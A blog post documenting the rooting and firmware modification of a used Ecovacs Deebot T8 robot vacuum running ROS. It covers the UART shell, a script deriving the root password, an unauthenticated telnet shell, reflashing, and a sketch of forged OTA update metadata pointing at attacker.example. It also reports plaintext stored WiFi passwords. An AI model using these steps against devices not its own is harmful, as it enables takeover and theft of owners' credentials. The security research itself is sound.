I came across a DEFCON talk by Dennis Giese about how he and his team got shell access to Ecovacs robots and found serious vulnerabilities in how Ecovacs handles sensitive information. Intrigued, I wanted to learn more, and from the detailed collection of information on these robots that Dennis and his team put together at robotinfo.dev, I was excited to discover that Ecovacs robots run ROS.

Since these robots have gotten cheaper on the second-hand market, I found a used one with a broken motor for dirt cheap. Below is the documented journey into the internals of an Ecovacs Deebot T8 running ROS Melodic on a Rockchip PX30 SoC.


Getting Shell Access

Going through the slides that Dennis had put on the website, I was quickly able to identify and connect to the UART port. The pinout is given at the end of his slide deck and is straightforward: GND, RX, and TX. Hooking it up to a serial-to-USB adapter, I was able to watch the boot sequence.

The password for the root user is calculated at boot by a script whose algorithm Dennis figured out. It combines three pieces of information:

  • the machine codename (px30-sl for the T8; thanks to Dennis for providing this)
  • a hardcoded key string (d4:3d:7e:fa:12:5d:C8:02:8F:0A:E2:F5)
  • the last 8 characters of the device serial number

These are concatenated in that order with a newline appended, then run through SHA256 to produce a hex digest. That hex string is then suffixed with -\n and the whole thing is Base64 encoded to produce the final password. The result is deterministic — the same serial number always produces the same password — which is why Dennis was able to reverse engineer it and build the web calculator.
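
As a sketch, the derivation described above can be reproduced with standard tools. The codename and key string are the ones listed above; the serial tail below is a made-up example, not a real device serial.

```shell
#!/bin/sh
# Sketch of the root-password derivation described above.
# SERIAL_TAIL is a made-up example; the real value is the last
# 8 characters of the device's serial number.
CODENAME="px30-sl"
KEY="d4:3d:7e:fa:12:5d:C8:02:8F:0A:E2:F5"
SERIAL_TAIL="E1234567"

# Concatenate in order with a trailing newline, SHA256 -> hex digest
DIGEST=$(printf '%s%s%s\n' "$CODENAME" "$KEY" "$SERIAL_TAIL" \
         | sha256sum | cut -d' ' -f1)

# Suffix the digest with "-\n", then Base64 encode the result
printf '%s-\n' "$DIGEST" | base64 | tr -d '\n'
```

Since the inputs are fixed per device, the output is deterministic, which is exactly what makes the web calculator possible.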


The Setup

Once I had shell access, I started with a raw squashfs dump (rootfs.squashfs, 36MB) extracted from the robot's NAND flash. The goal: understand how the robot works, modify it, and see whether custom firmware can be reflashed.

Platform details uncovered during the process:

  • SoC: Rockchip PX30 (aarch64)
  • OS: Custom embedded Linux, BusyBox userspace
  • ROS: Melodic (ROS 1)
  • Flash: NAND via Rockchip rkflash driver
  • IoT: Ecovacs cloud (XMPP/MQTT via medusa daemon)

Part 1: Boot Sequence

The entry point is /etc/inittab:

::sysinit:/etc/rc.sysinit
::respawn:/sbin/getty 115200 ttyFIQ0

Two things stand out immediately:

  1. The system init runs /etc/rc.sysinit
  2. A login shell runs on ttyFIQ0 at 115200 baud — the Rockchip FIQ debug UART. This is the same shell I had been using over the serial connection.

rc.conf — The Daemon List

/etc/rc.conf defines which daemons start at boot using a space-separated DAEMONS list. Prefixes control behaviour:

  • No prefix → start synchronously
  • @ → start in background
  • ! → skip entirely

DAEMONS="pre_boot.sh mount_data.sh post_boot.sh time_sync.sh audio_service.sh
         wifi.sh ros.sh wpa_supplicant.sh medusa.sh deebot.sh wifi_service.sh
         wifi_daemon.sh key_service.sh crond.sh !vsftpd.sh goahead.sh
         start_ap.sh !autostart.sh play_boot_music.sh !adbd.sh ota_status.sh dog.sh"

Notable disabled services: autostart (the /data/autostart/ hook), vsftpd (FTP), adbd (ADB).
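
A minimal sketch of how such a prefix-driven list can be dispatched. This mirrors the prefix semantics described above, not the robot's actual rc.sysinit code:

```shell
#!/bin/sh
# Hypothetical dispatcher for a DAEMONS-style list; illustrates the
# prefix semantics only, not the actual rc.sysinit implementation.
DAEMONS="pre_boot.sh @wifi.sh !vsftpd.sh"

for d in $DAEMONS; do
    case "$d" in
        '!'*) echo "skipping ${d#!}" ;;          # ! -> disabled
        '@'*) echo "backgrounding ${d#@}" ;;     # @ -> run in background
        *)    echo "running $d" ;;               # no prefix -> synchronous
    esac
done
```

Running it prints "running pre_boot.sh", "backgrounding wifi.sh", and "skipping vsftpd.sh", one per line.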

Boot Order Summary

Stage Script What it does
1 pre_boot.sh GPIO setup, WiFi power-on, zram swap
2 mount_data.sh Mounts /data (writable partition)
3 post_boot.sh Reads sysinfo from NAND, sets up IoT config
4 ros.sh Starts roscore (ROS master)
5 wpa_supplicant.sh WiFi association
6 medusa.sh Ecovacs IoT/cloud daemon
7 deebot.sh Main robot process
8 autostart.sh Runs *.sh scripts from /data/autostart/
9 dog.sh Watchdog (monitors medusa, WiFi health)

Part 2: The ROS Architecture

roscore

ros.sh starts roscore with:

export ROS_HOSTNAME=deebot
export ROS_MASTER_URI=http://deebot:11311
roscore --master-logger-level=fatal &

The deebot Binary — A Custom Node Loader

Rather than using rosrun or roslaunch, the robot uses a single binary deebot that dynamically loads ROS nodes as shared libraries from /usr/lib/node/:

deebot /etc/conf/dxai_node.json

The config dxai_node.json lists all nodes:

{
  "path": "/usr/lib/node",
  "nodes": [
    { "lib": "eros_node_hardware_platform", "node": "hardware_platform" },
    { "lib": "eros_node_task_manager",       "node": "task_manager" },
    { "lib": "eros_node_slam",               "node": "slam" },
    { "lib": "eros_node_setting",            "node": "setting" },
    { "lib": "eros_node_return",             "node": "return" },
    { "lib": "eros_node_map",                "node": "map" },
    { "lib": "eros_node_clean",              "node": "clean" },
    { "lib": "eros_node_alert",              "node": "alert" },
    { "lib": "eros_node_lifespan",           "node": "lifespan" },
    { "lib": "eros_node_inspect_charger",    "node": "chargeinspect" },
    { "lib": "eros_node_bigdata",            "node": "bigdata" },
    { "lib": "eros_node_rock",               "node": "rock" }
  ]
}

Each library exports create_instance_<name>() and delete_instance_<name>() as entry points.

Node Breakdown

Node Library Purpose
hardware_platform liberos_node_hardware_platform.so (1.2MB) HAL — owns /dev/ttyS1,3,4 (lidar, motors, laser)
task_manager liberos_node_task_manager.so (2.2MB) Orchestrates all cleaning task lifecycle
slam liberos_node_slam.so (344KB) SLAM wrapper around external libslam.so
setting liberos_node_setting.so (401KB) Fan speed, water level, mop mode, schedules
return liberos_node_return.so (435KB) Return-to-dock navigation
map liberos_node_map.so (923KB) Map storage, zones, virtual walls
clean liberos_node_clean.so (690KB) Path planning, cleaning execution, carpet detection
alert liberos_node_alert.so (213KB) Fault detection, alert publishing
lifespan liberos_node_lifespan.so (184KB) Component wear tracking
chargeinspect liberos_node_inspect_charger.so (160KB) Charger dock signal validation
bigdata liberos_node_bigdata.so (1.1MB) Telemetry aggregator, uploads to Ecovacs cloud
rock liberos_node_rock.so (70KB) Oscillation motion for stuck recovery

The medusa Daemon

medusa is the IoT bridge — it connects to Ecovacs servers and bridges cloud commands to ROS via mdsctl:

medusa -f /etc/conf/medusa/deebot_px30_sl.conf

If medusa exits, it kills deebot. If deebot exits, medusa gets killed. They are tightly coupled — one without the other is not a valid state.


OTA Mechanism

The OTA update flow fetches firmware with wget --no-check-certificate, meaning TLS certificate validation is disabled. The robot queries:

https://portal-ww.ecouser.net/api/ota/products/wukong/class/<model>/firmware/latest.json

The metadata JSON contains: version, url, checkSum (MD5). Since the server certificate isn't validated, a DNS MITM attack could serve a crafted firmware update — you'd control both the JSON and the image, so the MD5 check is no obstacle.
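
To see why the checksum doesn't help here: whoever serves the JSON also picks the MD5, so a tampered image trivially passes. A sketch, with hypothetical file names:

```shell
#!/bin/sh
# An attacker controlling the update response publishes a checksum
# matching their own image, so the MD5 only guards against corruption
# in transit, never against tampering.
IMG=evil_rootfs.squashfs
printf 'definitely not real firmware' > "$IMG"

SUM=$(md5sum "$IMG" | cut -d' ' -f1)
cat > latest.json <<EOF
{ "version": "9.9.9", "url": "http://attacker.example/$IMG", "checkSum": "$SUM" }
EOF

# The robot's verification step passes by construction
grep -q "$SUM" latest.json && echo "checksum OK"
```

Only a signature over the image, verified against a key the attacker doesn't hold, would close this gap.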


Part 3: Flash Layout

The NAND flash is exposed via Rockchip's rkflash block device driver. Partition layout:

/proc/partitions:
  rkflash0      — full device (487424 blocks = 476MB)
  rkflash0p1    — uboot    (4MB)
  rkflash0p2    — trust    (4MB)
  rkflash0p3    — mx       (4MB)
  rkflash0p4    — my       (4MB)
  rkflash0p5    — sys      (2MB)   ← boot slot selector + sysinfo
  rkflash0p6    — boot1    (6MB)   ← Android boot image, slot A
  rkflash0p7    — rootfs1  (70MB)  ← squashfs, slot A
  rkflash0p8    — boot2    (6MB)   ← Android boot image, slot B
  rkflash0p9    — rootfs2  (70MB)  ← squashfs, slot B (default)
  rkflash0p10   — data     (298MB) ← writable /data partition

Named partition symlinks live at /dev/block/bootdevice/by-name/.

A/B Slot System

The device uses a dual-rootfs redundancy scheme. The active slot is selected by U-Boot reading the first sector of the sys partition (rkflash0p5):

boot_mode1\n  →  loads boot1 (p6) + rootfs1 (p7)
boot_mode2\n  →  loads boot2 (p8) + rootfs2 (p9)  [factory default]

This is confirmed by two observations: the kernel cmdline has an empty androidboot.slot_suffix=, and both boot images have empty embedded cmdlines — U-Boot generates the cmdline dynamically based on boot_mode.

Switching slots:

printf 'boot_mode1\n' | dd of=/dev/rkflash0p5 bs=1 count=11 conv=notrunc && sync

Recovering to factory slot:

printf 'boot_mode2\n' | dd of=/dev/rkflash0p5 bs=1 count=11 conv=notrunc && sync
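
Either write can be rehearsed on a scratch file first — the dd invocation is byte-identical, only the output path changes:

```shell
#!/bin/sh
# Dry run of the slot switch against a scratch file instead of
# /dev/rkflash0p5 -- the same 11-byte overwrite, with zero risk.
IMG=sys_scratch.img
printf 'boot_mode2\n' > "$IMG"    # simulate the factory default

printf 'boot_mode1\n' | dd of="$IMG" bs=1 count=11 conv=notrunc 2>/dev/null
head -c 10 "$IMG"    # prints: boot_mode1
```

The count=11 covers the ten characters plus the trailing newline, and conv=notrunc leaves the rest of the sector untouched.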

Part 4: Modifying and Reflashing

Understanding the Read-Only Root Filesystem

The Deebot's root filesystem is a SquashFS image — a read-only compressed filesystem mounted directly from NAND flash. This means any changes made to files under / (including /etc, /opt/ros, /usr/lib) are lost on reboot, as there is no persistent writable overlay.

To make permanent modifications — such as patching libxmlrpcpp.so to fix the XML-RPC bind address, or updating the ROS environment variables in rc.sysinit — the only option is to:

  1. Extract the squashfs image
  2. Modify files on a host machine
  3. Repack it with mksquashfs
  4. Transfer the new image to the robot's writable /data partition
  5. Flash it directly to the rootfs NAND partition (/dev/rkflash0p7) with dd

The /data partition is the only truly persistent writable storage on the device, which is why WiFi credentials, maps, logs, and user configuration all live there — it survives reflashes entirely. This architecture is common in embedded systems: immutable system partition + mutable data partition.

Changes Made

File Change
etc/rc.conf Removed ! from autostart.sh to enable /data/autostart/ scripts
etc/rc.sysinit Enabled telnetd -l /bin/sh -p 23 &
etc/rc.sysinit Fixed hostname: deboot → deebot
etc/rc.sysinit ROS_HOSTNAME=deebot, ROS_MASTER_URI=http://deebot:11311
etc/rc.d/ros.sh Same ROS env changes
etc/rc.d/deebot.sh Same ROS env changes
etc/rc.d/medusa.sh Same ROS env changes
etc/hosts Created: 127.0.0.1 localhost + 127.0.0.1 deebot
/data/autostart/dropbear.sh Added a dropbear SSH server script to remove the dependency on the UART cable

Why /etc/hosts Was Needed

ROS requires ROS_HOSTNAME to be resolvable — roscore contacts itself via that name. Without /etc/hosts mapping deebot to 127.0.0.1, roscore fails with:

RLException: Unable to contact my own server at [http://deebot:44629/]

The original firmware had no /etc/hosts because it used localhost (always resolves). After switching to a named hostname, this file became necessary.
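
A quick way to confirm the fix from a shell on the device — this assumes getent is available; on very minimal BusyBox builds a `ping -c1 deebot` works as a cruder check:

```shell
#!/bin/sh
# Sanity check: ROS_HOSTNAME must resolve before roscore starts.
if getent hosts deebot >/dev/null; then
    echo "deebot resolves; roscore can bind"
else
    echo "deebot not resolvable: add it to /etc/hosts"
fi
```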

SSH Access via Dropbear

To eliminate the need for a physical UART connection, I added a dropbear SSH server that starts automatically via a script at /data/autostart/dropbear.sh.

This script runs on boot (since we enabled autostart.sh in rc.conf), allowing wireless SSH access over WiFi. Once this was in place, the UART cable could be disconnected — all debugging and ROS exploration can now be done remotely over SSH.
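
The script itself isn't reproduced in this post; a hypothetical minimal version might look like the following, where the binary location, key path, and port are all assumptions:

```shell
#!/bin/sh
# Hypothetical /data/autostart/dropbear.sh -- not the actual script.
# Assumes static dropbear + dropbearkey binaries have been copied to
# /data/bin, with host keys kept on the writable partition.
KEYDIR=/data/dropbear
mkdir -p "$KEYDIR"

# Generate a host key once; reuse it on subsequent boots
[ -f "$KEYDIR/rsa_host_key" ] || \
    /data/bin/dropbearkey -t rsa -f "$KEYDIR/rsa_host_key"

# -r: host key file, -p: listen port
/data/bin/dropbear -r "$KEYDIR/rsa_host_key" -p 22
```

Keeping everything under /data means the server survives rootfs reflashes along with the rest of the persistent state.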

Build Command

sudo mksquashfs squashfs-root/ new_rootfs.squashfs \
    -comp gzip -b 131072 -noappend \
    -force-uid 0 -force-gid 0

Key flags:

  • -comp gzip -b 131072 — must match original filesystem parameters
  • -force-uid 0 -force-gid 0 — all files must be owned by root, not the build user
  • -noappend — create fresh, don't append to existing file

Flash Procedure

# Transfer new_rootfs.squashfs to robot /data/ via netcat:
# Robot:  nc -l -p 1234 > /data/new_rootfs.squashfs
# Host:   pv new_rootfs.squashfs | nc -q 1 <robot_ip> 1234

# Verify squashfs magic (68 73 71 73 = "hsqs")
dd if=/data/new_rootfs.squashfs bs=4 count=1 2>/dev/null | od -A x -t x1

# Write to inactive slot (safe — doesn't affect running system)
dd if=/data/new_rootfs.squashfs of=/dev/rkflash0p7 bs=4096 && sync

# Switch boot slot
printf 'boot_mode1\n' | dd of=/dev/rkflash0p5 bs=1 count=11 conv=notrunc && sync

reboot
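
Before rebooting, it's worth verifying that the bytes on flash match the image. Since the partition is larger than the image, read back exactly the image's byte count and compare hashes:

```shell
#!/bin/sh
# Compare the image against the partition contents; only read back
# the image's byte count, since the partition is padded beyond it.
SIZE=$(wc -c < /data/new_rootfs.squashfs)
IMG_SUM=$(md5sum /data/new_rootfs.squashfs | cut -d' ' -f1)
FLASH_SUM=$(head -c "$SIZE" /dev/rkflash0p7 | md5sum | cut -d' ' -f1)

if [ "$IMG_SUM" = "$FLASH_SUM" ]; then
    echo "flash write verified"
else
    echo "MISMATCH: do not switch slots"
fi
```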

Lessons Learned

  1. The ! prefix in DAEMONS disables services — !autostart.sh and !vsftpd.sh were silently skipped. Easy to miss when reading individual rc.d scripts in isolation.

  2. squashfs ownership requires -force-uid 0 -force-gid 0 — running mksquashfs as root isn't enough if the source files are owned by a regular user on the host.

  3. The A/B slot system is a great safety net — writing to the inactive slot and switching boot_mode means the original firmware is always one dd command away from recovery.


Security Concerns

While exploring the robot's internals, I was able to independently confirm the serious privacy and security issues that Dennis Giese and his team originally discovered and reported:

Data Persistence After Factory Reset

I bought this Ecovacs Deebot T8 from Facebook Marketplace. The previous owner had performed a factory reset before selling it. However, when I got it home and connected it to the app:

  • The previous owner's map data was still present - including custom room names and defined cleaning zones
  • This persisted despite creating a new account and adding the robot as a "new" device
  • The factory reset clearly doesn't wipe the /data partition properly

Plain Text WiFi Credentials

Once I gained shell access, I found an even worse issue:

WiFi passwords are stored in plain text in the /data/config/netmon/serv.conf file. The system:

  • Stores credentials as simple key-value pairs
  • Maintains historical data of all previous networks
  • Never purges old credentials

This means every WiFi network the robot has ever connected to (including all previous owners' SSIDs and passwords) remains on the device in plain text.

Security Impact:

  • A used robot is essentially a WiFi password database of everyone who's owned it
  • No encryption, no secure storage
  • "Factory reset" doesn't clear this data
  • Physical access to UART = full credential dump

This is a serious privacy vulnerability that affects anyone selling or buying used Ecovacs robots.


What's Next: Exploring the ROS Implementation

As a roboticist, what excites me most about this platform isn't just the security research — it's seeing ROS deployed in a production consumer device. While this post focused on gaining access and understanding the system architecture, there's a whole other layer to explore: how Ecovacs actually uses ROS in practice.

Future Deep Dives

I'm planning follow-up posts that dive into:

ROS Topics & Services:

  • What topics are published by each node?
  • How does the task_manager orchestrate cleaning operations?
  • What's the message flow between SLAM, navigation, and motor control?
  • How does the cloud bridge (medusa) interact with ROS topics?

SLAM Implementation:

  • How does the libslam.so library work?
  • What SLAM algorithm is being used? (Is it a custom implementation or based on known techniques?)
  • How is map data structured and stored?
  • Can we visualize the SLAM output in RViz?

Navigation & Path Planning:

  • How does return-to-dock navigation work?
  • What's the path planning algorithm in the clean node?
  • How does carpet detection integrate with the cleaning logic?
  • Can we modify cleaning patterns or behaviors?

Production ROS Lessons:

  • What can we learn from seeing ROS in a mass-market product?
  • How did they handle the single-binary node loader vs. traditional roslaunch?
  • What are the performance characteristics on embedded hardware (PX30)?
  • How is error handling and fault tolerance implemented?

Why This Matters

Most roboticists work with ROS in labs, research environments, or prototypes. Seeing it deployed in millions of consumer devices is rare. Understanding how Ecovacs optimized ROS for production — the good, the bad, and the ugly — offers valuable insights for anyone building commercial robots.

Plus, having full root access to a ROS robot with LIDAR, navigation, and SLAM running on real hardware is an incredible learning platform.

Stay tuned for Part 2, where we'll dive deep into the ROS architecture and start poking at those topics and services.